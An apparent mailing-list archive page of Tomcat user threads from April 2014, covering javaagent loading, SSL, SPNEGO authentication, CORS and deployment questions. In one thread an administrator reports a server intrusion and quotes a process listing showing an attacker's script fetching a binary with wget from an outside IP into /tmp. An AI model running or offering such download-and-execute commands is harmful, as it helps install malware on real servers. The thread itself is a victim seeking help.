Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

2014-04-29 Thread Fredrik
Christopher Schultz skrev 2014-04-29 17:38: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Fredrik, On 4/29/14, 4:28 AM, Fredrik wrote: Hello. We're using jamm (https://github.com/jbellis/jamm) a java agent for measuring object memory usage, passing the javaagent argument to tomcat as "-javaa

Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

2014-04-29 Thread Konstantin Kolinko
2014-04-29 12:28 GMT+04:00 Fredrik : > Hello. > We're using jamm (https://github.com/jbellis/jamm) a java agent for > measuring object memory usage, passing the javaagent argument > to tomcat as > "-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar". > When running 7.0.50 everything wo

Re: Regarding i think an intrusion

2014-04-29 Thread Konstantin Kolinko
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini : > Hello Dan, > > Nop, the attacker is executing locally the following > > tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh > tomcat8893 8882 0 Apr27 ?00:00:00 wget > http://218.199.102.59/.xy/squid32 -O /tmp/squid > > And t

Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
sorry, but i forget to post /usr/java/default/bin/java -version java version "1.6.0_41" Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) Saludos.- Leonardo Santagostini 2014-04-29 1

Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places.

Re: Regarding i think an intrusion

2014-04-29 Thread Daniel Mikusa
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini wrote: > Hello list, > > Im facing an issue in 6 tomcat server that are getting penetrated and they > are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as to how they are ac

Setup Issue tomcat 6 SLES 11 SSL

2014-04-29 Thread Vincent T. DiScipio
Hi, I have setup tomcat 6 on SLES 11 and secured the instance with an external certificate if authority. The following is occurring from the same machine using both IE and Firefox: http://servername.wooster.edu:8080works for both IE11 and Firefox 29 and displays the index.html https://ser

Re: Regarding i think an intrusion

2014-04-29 Thread JB MORLA
Hi, I am learning to set up a server and I found this article about security http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini < lsantagost...@gmail.com> wrote: > Hello list, > > Im facing an issue in 6 tomcat server that a

Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. PS: This is my first mail to this list, so i apologize for this not gentl

Need How-To Authenticate with built-in SPNEGO and Authorize with a DataSourceRealm or JAAS database role lookup.

2014-04-29 Thread Troyer, Ron
Hi, I am new to Tomcat and need some guidance. I am trying to setup a Tomcat 7.0.53 instance on a Windows 7 box, using JDK 1.7_51. I have read the section of the documentation about Windows Authentication, but I am confused at this point. From the documentation I have been unable to determ

Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

2014-04-29 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Fredrik, On 4/29/14, 4:28 AM, Fredrik wrote: > Hello. We're using jamm (https://github.com/jbellis/jamm) a java > agent for measuring object memory usage, passing the javaagent > argument to tomcat as > "-javaagent:../../tomcat/webapps/ROOT/WEB-INF

Re: Tomcat 8.0.5 servlet-api 3.0.1 to 3.10. Vista, Java 1.7.0_51

2014-04-29 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Mitch, On 4/28/14, 3:16 PM, Mitch Kyle wrote: > In a ServletContextListener of my webapp > "ServletContext.getRealPath("/path")" is called. The path is valid > and exists. > > With servlet-api 3.0.1, this returns null. In 3.1.0, it returns > the e

Re: Application Deployment in Tomcat 7.X

2014-04-29 Thread Nitin Kumar
Thanks Chris, Issue has been resolved. After your reply, I did small POC with two projects, tomcat is behaving as per expectation. Then I went back to project and checked. I found that we were explicitly doing system exit on application deployment failure. We have resolved this. Thanks for your h

Re: CORS issue with Tomcat and Android Webview

2014-04-29 Thread Jose María Zaragoza
2014-04-29 0:38 GMT+02:00 Terence M. Bandoian : > On 4/28/2014 5:32 PM, Terence M. Bandoian wrote: >> >> On 4/28/2014 3:08 PM, Jose María Zaragoza wrote: >>> >>> 2014-04-28 21:55 GMT+02:00 Terence M. Bandoian : On 4/26/2014 6:56 AM, Jose María Zaragoza wrote: > > 2014-04-26 13:16

javaagent initialization (premain-method) not triggered by tomcat 7.0.52

2014-04-29 Thread Fredrik
Hello. We're using jamm (https://github.com/jbellis/jamm) a java agent for measuring object memory usage, passing the javaagent argument to tomcat as "-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar". When running 7.0.50 everything works as expected but after upgrading to 7.0.52